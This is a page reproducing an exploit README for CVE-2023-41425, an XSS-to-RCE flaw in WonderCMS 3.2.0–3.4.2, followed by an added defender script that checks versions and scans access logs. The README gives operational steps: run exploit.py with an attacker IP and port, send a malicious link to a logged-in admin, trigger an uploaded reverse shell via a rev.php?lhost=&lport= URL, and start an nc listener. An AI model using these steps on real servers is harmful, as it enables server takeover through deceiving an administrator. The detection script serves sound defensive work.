## https://sploitus.com/exploit?id=2F4E3DBE-F5A4-5CC2-9DED-5A6FC9264EA6
# CVE-2023-41425-WonderCMS-Authenticated-RCE
## Description
WonderCMS v3.2.0 - v3.4.2 is vulnerable. A remote attacker can take full control of the server through a Cross-Site Scripting (XSS) exploit (for educational purposes only). Here's the game plan:

## How it works
The exploit abuses the installModule component of WonderCMS to sneak in a crafted script that runs arbitrary code.

## The Setup
* Tool: exploit.py
* What You Need:
  - Target URL where WonderCMS is installed (no admin password required).
  - Your attacker machine's IP.
  - A port for your reverse shell listener.

## Step-by-Step Execution
1. The script generates a file called xss.js. This JavaScript weapon is designed to exploit reflected XSS.
2. It spits out a malicious link. You’ll send that to the admin.
3. The magic happens when the admin (a logged-in user) opens or clicks your link:
  - Background requests fire without their consent.
  - A reverse shell payload is uploaded using the theme/plugin upload feature.
4. Once uploaded, the payload executes and grants you a reverse shell connection straight to the target server.

```sh
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
```

Example

```sh
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
```

## Fail-Safe
If the reverse shell doesn't trigger automatically, just open this URL directly:
```sh
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
```
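For defenders, the two request shapes this README describes (a hit on the installModule component, and a PHP file under `/themes/` fetched with `lhost`/`lport` parameters, the fail-safe URL above) are straightforward to look for in web-server access logs, and the affected version range is straightforward to check. The Python script below is an added example written for this page; it is not part of exploit.py or of WonderCMS. It assumes a combined-log-format access log, treats any request target whose query string carries an `installModule` parameter as a hit (the README does not spell out the exact request layout), and the log lines it scans are constructed for the example rather than captured traffic.

```python
"""Defender-side triage for the WonderCMS installModule / theme-upload abuse
described in this README (added example, not part of the PoC or of WonderCMS).

Two checks:
  1. is_vulnerable_version(): is a reported WonderCMS version inside the
     3.2.0 - 3.4.2 range the README names?
  2. scan_access_log(): flag access-log lines matching the request shapes
     the README describes: an installModule request, or a PHP file under
     /themes/ requested with lhost and lport query parameters (the fail-safe
     URL shape).
"""
import re
from urllib.parse import parse_qs, urlsplit

# Affected range as stated in the README (inclusive on both ends).
VULN_MIN = (3, 2, 0)
VULN_MAX = (3, 4, 2)

# Combined log format; only the request line (method + target) is needed.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log, not real traffic. Line 2 and 3 are the shapes we
# want to catch; line 4 is a legitimate theme file fetch that must not fire.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
203.0.113.5 - - [10/Jan/2024:10:00:09 +0000] "GET /?installModule=http://203.0.113.9/revshell-main.zip HTTP/1.1" 200 88
203.0.113.5 - - [10/Jan/2024:10:00:15 +0000] "GET /themes/revshell-main/rev.php?lhost=203.0.113.9&lport=4444 HTTP/1.1" 200 0
198.51.100.7 - - [10/Jan/2024:10:01:00 +0000] "GET /themes/default/theme.php HTTP/1.1" 200 2048
"""


def parse_version(text):
    """Turn 'v3.4.2' or '3.4.2' into a comparable (major, minor, patch) tuple."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)$", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(text):
    """True if the version falls inside the range the README lists."""
    return VULN_MIN <= parse_version(text) <= VULN_MAX


def classify_request(target):
    """Return a label for a suspicious request target, or None if benign.

    'installModule' is assumed to appear as a query parameter; the README
    only names the component, so this is an assumption of the example.
    """
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if "installModule" in query:
        return "installModule"
    # Fail-safe shape from the README: /themes/<dir>/<file>.php?lhost=..&lport=..
    if (parts.path.startswith("/themes/") and parts.path.endswith(".php")
            and {"lhost", "lport"}.issubset(query)):
        return "theme-php-callback"
    return None


def scan_access_log(log_text):
    """Yield (line_number, label, target) for every flagged log line."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.search(line)
        if not m:
            continue  # not a request line we understand; skip it
        label = classify_request(m.group("target"))
        if label:
            hits.append((line_no, label, m.group("target")))
    return hits


if __name__ == "__main__":
    print("3.4.2 vulnerable:", is_vulnerable_version("3.4.2"))
    print("3.4.3 vulnerable:", is_vulnerable_version("3.4.3"))
    for line_no, label, target in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {label}: {target}")
```

Run it as-is to see the two constructed hits, or feed `scan_access_log()` the contents of a real access log. A legitimate theme fetch such as `/themes/default/theme.php` is deliberately not flagged, since themes normally ship a `theme.php`; the rule keys on the `lhost`/`lport` parameters, which no stock theme needs.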

## Note
Remember to start a listener before running the exploit, using the following command (the port must match the <YOUR_PORT> you pass to exploit.py):
```sh
nc -lvp 4444
```

## Credit
prodigiousMind for discovering and reporting the vulnerability: https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413